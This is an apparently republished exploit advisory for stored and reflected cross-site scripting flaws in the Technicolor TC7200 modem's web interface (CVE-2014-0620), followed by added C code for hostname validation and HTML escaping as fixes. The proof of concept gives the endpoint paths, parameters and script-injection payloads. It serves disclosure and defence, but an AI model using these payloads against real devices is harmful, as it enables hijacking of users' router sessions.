Technicolor TC7200 – Multiple Cross-Site Scripting Vulnerabilities

  • Author: Jeroen - IT Nerdbox
    Date: 2014-01-03
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/30668/
  • # Exploit Title: Technicolor TC7200 - Multiple XSS Vulnerabilities
    # Google Dork: N/A
    # Date: 02-01-2013
    # Exploit Author: Jeroen - IT Nerdbox
    # Vendor Homepage: http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways/cable-modems-gateways/tc7200-tc7300
    # Software Link: N/A
    # Version: STD6.01.12
    # Tested on: N/A
    # CVE : CVE-2014-0620
    #
    # Proof of Concept:
    # 
    # 
    ## Persistent Cross Site Scripting:
    #
    # POST: http://<ip>/parental/website-filters.asp
    # Parameters: 
    #
    # WebFilteringTable 0
    # WebFilteringChangePolicies 0
    # WebFiltersADDKeywords
    # WebFilteringdomainMode 0
    # ADDNewDomain <script>alert('IT Nerdbox');</script>
    # WebFiltersKeywordButton 0
    # WebFiltersDomainButton 1
    # WebPolicyName
    # WebFiltersRemove 0
    # WebFiltersADD 0
    # WebFiltersReset 0
    #
    #
    ## Reflected Cross Site Scripting
    #
    # POST: http://<ip>//goform/status/diagnostics-route
    # Parameters: 
    # 
    # VmTracerouteHost "><script>alert('ITNerdbox');</script>
    # VmMaxTTL 30
    # VmTrIsInProgress 0
    # VmTrUtilityCommand 1
    # 
    # Check out the video at: http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/
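
Added example, not part of the original advisory or the device firmware: C code for the two server-side controls that address both findings, strict hostname validation for fields such as ADDNewDomain and VmTracerouteHost, and HTML entity encoding whenever a stored or submitted value is written back into a page. The function names `is_valid_host` and `html_escape` are hypothetical, and the sample input is the VmTracerouteHost value from the proof of concept.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Input check: accept only hostname / dotted-IPv4 syntax (letters, digits,
 * '-', '.'; labels 1-63 chars, no leading or trailing '-'). 1 = valid. */
int is_valid_host(const char *s) {
    size_t len = strlen(s), label = 0;
    if (len == 0 || len > 253) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c != '.') {                       /* character inside a label */
            if (!isalnum(c) && c != '-') return 0;   /* '<', '>', '"', ... */
            if ((c == '-' && label == 0) || ++label > 63) return 0;
        } else {                              /* label separator */
            if (label == 0 || s[i - 1] == '-') return 0;
            label = 0;
        }
    }
    return label > 0 && s[len - 1] != '-';
}

/* Output encoding for element content and quoted attribute values.
 * Returns bytes written (excluding NUL), or -1 if dst is too small. */
int html_escape(const char *src, char *dst, size_t cap) {
    size_t out = 0;
    if (cap == 0) return -1;
    for (; *src; src++) {
        char one[2] = { *src, '\0' };
        const char *rep = *src == '&' ? "&amp;" : *src == '<' ? "&lt;" :
                          *src == '>' ? "&gt;"  : *src == '"' ? "&quot;" :
                          *src == '\'' ? "&#39;" : one;
        size_t n = strlen(rep);
        if (out + n + 1 > cap) return -1;     /* never truncate mid-entity */
        memcpy(dst + out, rep, n);
        out += n;
    }
    dst[out] = '\0';
    return (int)out;
}

int main(void) {
    /* Constructed sample: the VmTracerouteHost value from the PoC above. */
    const char *in = "\"><script>alert('ITNerdbox');</script>";
    char buf[256];
    if (html_escape(in, buf, sizeof buf) < 0) return 1;
    printf("valid=%d escaped=%s\n", is_valid_host(in), buf);
    return 0;
}
```

Validation alone rejects both PoC values. Encoding on output remains necessary for the persistent case, since entries stored before the check was deployed are still rendered.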